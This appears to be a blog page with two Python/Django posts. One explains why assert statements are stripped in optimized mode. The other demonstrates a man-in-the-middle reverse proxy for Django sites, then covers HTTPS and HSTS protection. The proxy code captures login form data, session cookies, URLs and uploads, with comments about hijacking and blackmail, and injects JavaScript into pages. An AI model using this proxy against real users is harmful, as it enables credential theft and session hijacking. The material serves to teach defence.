You might be using assert wrong

Assert is often used in production code as a form of data validation check or sanity testing. You may have seen code bases that contain logic like:

def validate_age(value):
    assert value < 70, "No youngsters allowed!"

import requests

# url is assumed to be defined elsewhere
response = requests.post(url=url, json={'foo': 'bar'})
assert response.ok, response.text

However, assertions should only be used for testing, development, and debugging purposes. assert is not meant to be used in production code. Don’t take my word for it. The Python docs for assert state:

Assert statements are a convenient way to insert debugging assertions into a program

https://docs.python.org/3/reference/simple_stmts.html#the-assert-statement

Optimized out

We can trigger an AssertionError in the shell:

python -c 'assert 80 < 70, "No youngsters allowed!"'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AssertionError: No youngsters allowed!

However, because Python provides assert as a debugging tool, it also provides a way to remove the assertions from the compiled bytecode by specifying -O:

python -O -c 'assert 80 < 70, "No youngsters allowed!"'

No AssertionError is raised! The same behavior can be triggered via the PYTHONOPTIMIZE environment variable, which has the same outcome as the -O command line switch:

PYTHONOPTIMIZE=1 python -c 'assert 80 < 70, "No youngsters allowed!"'

Again, no AssertionError is raised. As per the docs, both the -O flag and PYTHONOPTIMIZE have this effect:

Remove assert statements and any code conditional on the value of __debug__. Augment the filename for compiled (bytecode) files by adding .opt-1 before the .pyc extension (see PEP 488). See also PYTHONOPTIMIZE.

https://docs.python.org/3/using/cmdline.html#cmdoption-o
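The effect of both switches can also be reproduced inside a single interpreter session. The following is a minimal sketch, not taken from the Python docs: it relies on the optimize argument of the built-in compile(), where level 0 keeps assertions and level 1 strips them as -O does. The helper name raises_assertion is made up for illustration.

```python
SOURCE = 'assert 80 < 70, "No youngsters allowed!"'


def raises_assertion(optimize):
    """Run SOURCE compiled at the given optimization level.

    Returns True if the assert fired, False if it was stripped.
    """
    code = compile(SOURCE, "<example>", "exec", optimize=optimize)
    try:
        exec(code, {})
    except AssertionError:
        return True
    return False


print(raises_assertion(0))  # True: assertions are kept
print(raises_assertion(1))  # False: assertions are removed, as with -O
```

Passing the level explicitly means the result does not depend on how the surrounding interpreter was started.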

Bytecode is the “intermediate language” that sits between your Python source and the C code of the interpreter: Python source code is compiled into bytecode, the internal representation of a Python program in the CPython interpreter. With this knowledge, we can compare the compiled bytecode of the non-optimized and optimized versions:

python3 -c 'import dis; dis.dis("assert 80 < 70")'
  1           0 LOAD_CONST               0 (80)
              2 LOAD_CONST               1 (70)
              4 COMPARE_OP               0 (<)
              6 POP_JUMP_IF_TRUE         6 (to 12)
              8 LOAD_ASSERTION_ERROR
             10 RAISE_VARARGS            1
        >>   12 LOAD_CONST               2 (None)
             14 RETURN_VALUE

python3 -O -c 'import dis; dis.dis("assert 80 < 70")'
  1           0 LOAD_CONST               0 (None)
              2 RETURN_VALUE

PYTHONOPTIMIZE=1 python3 -c 'import dis; dis.dis("assert 80 < 70")'
  1           0 LOAD_CONST               0 (None)
              2 RETURN_VALUE

We see that in optimized mode Python does not just skip the assertions: they are literally removed. Therefore asserts are not for data validation and not for control flow, because they are one flag or environment variable away from being automatically removed from the application.
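One way to confirm the removal without reading a disassembly is to inspect the compiled code object directly. This is a rough sketch assuming CPython; the variable name age and the helper compile_check are made up for illustration. Because the assert is never compiled under optimization, the name it refers to does not even appear in the code object.

```python
SOURCE = "assert age < 70"


def compile_check(optimize):
    """Compile SOURCE at the given optimization level (0 = none, 1 = like -O)."""
    return compile(SOURCE, "<example>", "exec", optimize=optimize)


debug_code = compile_check(0)
optimized_code = compile_check(1)

# co_names holds the names the bytecode looks up at runtime.
print("age" in debug_code.co_names)      # True
print("age" in optimized_code.co_names)  # False

# The optimized bytecode is also shorter: only "return None" is left.
print(len(optimized_code.co_code) < len(debug_code.co_code))  # True
```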

If pytest is run with PYTHONOPTIMIZE=1, you get a helpful warning that assertions not in test modules or plugins will be ignored, which suggests the pytest maintainers have seen assertions abused too.

Correct usage of assert

Asserts should not be used for things like handling user input or checking for network errors since these can and do occur during normal execution.
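For conditions like these, an explicit check that raises an exception keeps working regardless of -O or PYTHONOPTIMIZE. Below is a minimal sketch of the age check from the start of the article rewritten that way; the limit parameter and the error message are assumptions made for illustration.

```python
def validate_age(value, limit=70):
    """Reject ages at or above `limit`, even when Python runs with -O."""
    if value >= limit:
        raise ValueError(f"age must be below {limit}, got {value}")
    return value


try:
    validate_age(80)
except ValueError as error:
    print(f"rejected: {error}")  # rejected: age must be below 70, got 80
```

For the HTTP example, requests offers response.raise_for_status(), which raises requests.HTTPError for 4xx and 5xx responses and is likewise unaffected by optimization.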

Assert statements are often misused for general error handling, which is not what they are for. They are meant to check assumptions that your code makes and to communicate those assumptions to other developers reading the code. For example, you might use an assert statement to check that a parameter is not None before using it. If the parameter is None, the assert statement raises an AssertionError, alerting you that your code has a problem.

Assert statements should only be used for conditions that should NEVER be false. A failing assertion then always indicates a bug in the program, rather than bad input or an environmental failure that can occur during normal execution.
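As an illustration of that split, here is a small sketch with a hypothetical function, split_evenly, that is not from the original article. Caller input is checked with an explicit exception, while the assert documents an internal invariant that can only fail if the function itself is buggy.

```python
def split_evenly(items, n_chunks):
    """Distribute `items` round-robin across `n_chunks` lists."""
    # Caller-supplied value: can legitimately be wrong, so validate explicitly.
    if n_chunks <= 0:
        raise ValueError(f"n_chunks must be positive, got {n_chunks}")

    chunks = [items[i::n_chunks] for i in range(n_chunks)]

    # Internal invariant: chunking must never lose or duplicate items.
    # If this fails, the bug is in split_evenly, not in the caller.
    assert sum(len(chunk) for chunk in chunks) == len(items), "chunking lost items"
    return chunks


print(split_evenly([1, 2, 3, 4, 5], 2))  # [[1, 3, 5], [2, 4]]
```

If the assert is stripped by -O, the function still behaves correctly for every input, which is a useful rule of thumb for whether an assert is appropriate.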

This is useful for testing as it allows you to check that your code is working as expected.

Debugging and Testing

The assert keyword is used to check for bugs in your code when debugging. Using assert, you can manually test your code to see if it works properly by checking for an AssertionError. If an assert statement fails and the AssertionError is not caught, the program stops with a traceback pointing at the failed assumption. This can be very useful for debugging your code.

Unit tests provide a more comprehensive way to test code, and libraries like pytest expect assert to be used in tests.
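A pytest-style test might look like the sketch below. The function apply_discount and its rules are hypothetical, chosen only to show plain assert statements inside test functions; pytest collects functions whose names start with test_.

```python
def apply_discount(price, percent):
    """Return `price` reduced by `percent` percent."""
    if not 0 <= percent <= 100:
        # Caller-supplied data: validated explicitly, not with assert.
        raise ValueError(f"percent must be between 0 and 100, got {percent}")
    return price * (100 - percent) / 100


def test_apply_discount():
    # In a test, a failing assert is exactly the signal we want.
    assert apply_discount(200, 25) == 150
    assert apply_discount(80, 0) == 80


def test_apply_discount_rejects_bad_percent():
    try:
        apply_discount(100, 150)
    except ValueError:
        pass
    else:
        raise AssertionError("expected ValueError")
```

With pytest installed, the second test would more commonly be written with the pytest.raises context manager; the try/except form is used here only to keep the sketch free of third-party imports.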


Hacking Django websites: Man In The Middle attack

A website served via HTTP is vulnerable to Man In The Middle (MITM) attacks: a hacker can get between your browser and the server responding to the browser’s requests. The response or request can be amended for malicious intent. A Man could get In The Middle after an unsuspecting user connects to a nefarious network e.g. when joining a cafe’s wifi or after a cheeky connection to a neighbor’s unprotected network: these may be honey traps.

Concretely, one way to achieve this is by creating a reverse proxy. Here’s an example of a MITM adding some JavaScript to the response:

import revproxy.views
from bs4 import BeautifulSoup

from django.http import HttpResponse

# after 2 seconds change some content
javascript = BeautifulSoup(
    """<script>
    setTimeout(function() {
        document.querySelectorAll("h1")[0].innerText = "HACKED!";
    }, 2000);
</script>""",
    'html.parser',
)

class ProxyView(revproxy.views.ProxyView):

    def dispatch(self, request, *args, **kwargs):
        # user may be logging in, so save the form data so to maybe steal their username and password
        save_form_data(request.GET or request.POST)

        # cookies may contain session cookie, so save it to later maybe do session hijacking
        save_cookies(request.COOKIES)

        # user may be doing something embarrassing, so save the url to maybe blackmail them
        save_url(request.get_full_path())

        # user may be uploading some embarrassing pictures of documents. more blackmail
        save_files(request.FILES)

        response = super().dispatch(request=request, path=request.get_full_path(), *args, **kwargs)

        # default to '' so a response without a Content-Type header does not raise TypeError
        if 'text/html' in response.get('content-type', ''):
            # now inject nefarious JavaScript
            soup = BeautifulSoup(response.content, 'html.parser')

            soup.head.append(javascript)
            response = HttpResponse(str(soup))
        return response

And this is the outcome: two seconds after the page loads, the first h1 on the page reads “HACKED!”.

Protection

This can be avoided by serving exclusively on HTTPS, as the content will no longer be in plain text for the MITM to read and mutate. Django supports this via SECURE_SSL_REDIRECT, which makes Django redirect any HTTP request to HTTPS. However, this is an incomplete solution:

  • a MITM could intercept the “redirect to HTTPS” response and change it.
  • a MITM could upgrade your HTTP request to HTTPS on your behalf: the user’s HTTP request terminates at the MITM, who forwards it to the site over HTTPS, so the data is still plainly readable by the bad actor.
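For reference, the redirect mentioned before the list is enabled with a single setting. This is a minimal settings fragment, assuming a standard Django project; the caveats in the list still apply, because the user’s first request is still plain HTTP.

```python
# settings.py (fragment)
MIDDLEWARE = [
    # SecurityMiddleware is what performs the redirect.
    'django.middleware.security.SecurityMiddleware',
    # ... the rest of your middleware
]

# Redirect every plain-HTTP request to its HTTPS equivalent.
SECURE_SSL_REDIRECT = True
```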

There is a solution to that in HTTP Strict Transport Security (HSTS) protection: once the browser has seen the HSTS header, it blocks HTTP requests to your website and uses HTTPS instead.

Django facilitates that via the SECURE_HSTS_SECONDS setting. When first setting the value it’s worth using a small value like 3600 (1 hour) to check it works as expected, as once the browser sees the HSTS header it will respect it until the specified time has elapsed, meaning if your website has misconfigured HTTPS certificates then you cannot roll back to HTTP while you fix it.

It’s also advisable to set SECURE_HSTS_INCLUDE_SUBDOMAINS so the browser uses HSTS for all subdomains and not just the current one. It would be a shame to protect http://example.com but not http://www.example.com.
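To make the two settings less abstract, the sketch below builds the value of the Strict-Transport-Security response header that they translate into. It is a stand-alone illustration, not Django’s implementation, and the function name build_hsts_header is made up.

```python
def build_hsts_header(seconds, include_subdomains=False):
    """Return a Strict-Transport-Security header value.

    `seconds` plays the role of SECURE_HSTS_SECONDS and
    `include_subdomains` the role of SECURE_HSTS_INCLUDE_SUBDOMAINS.
    """
    if seconds < 0:
        raise ValueError("max-age cannot be negative")
    value = f"max-age={seconds}"
    if include_subdomains:
        value += "; includeSubDomains"
    return value


print(build_hsts_header(3600, include_subdomains=True))
# max-age=3600; includeSubDomains
```

The max-age part is what makes a small initial value attractive: the browser remembers the policy for exactly that many seconds after it last saw the header.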

So, concretely, the following change will help protect your Django website against Man In The Middle attacks:

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    ...
]

SECURE_HSTS_SECONDS = 3600
SECURE_HSTS_INCLUDE_SUBDOMAINS = True

Note that the SECURE_HSTS_ settings require django.middleware.security.SecurityMiddleware to be present in MIDDLEWARE; otherwise they do nothing.
